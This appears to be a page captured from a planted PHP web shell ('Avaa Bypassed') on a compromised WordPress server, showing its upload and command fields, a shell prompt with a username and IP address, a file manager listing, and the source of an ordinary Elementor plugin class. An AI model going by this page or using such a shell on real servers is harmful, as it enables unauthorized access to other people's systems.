[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.222.162.161: ~ $
<?php
namespace Elementor\Core\Debug\Classes;

abstract class Inspection_Base {

	/**
	 * @return bool
	 */
	abstract public function run();

	/**
	 * @return string
	 */
	abstract public function get_name();

	/**
	 * @return string
	 */
	abstract public function get_message();

	/**
	 * @return string
	 */
	public function get_header_message() {
		return esc_html__( 'The preview could not be loaded', 'elementor' );
	}

	/**
	 * @return string
	 */
	abstract public function get_help_doc_url();
}

Filemanager

Name Type Size Permission Actions
htaccess.php File 1.26 KB 0644
inspection-base.php File 502 B 0644
shop-page-edit.php File 709 B 0644
theme-missing.php File 645 B 0644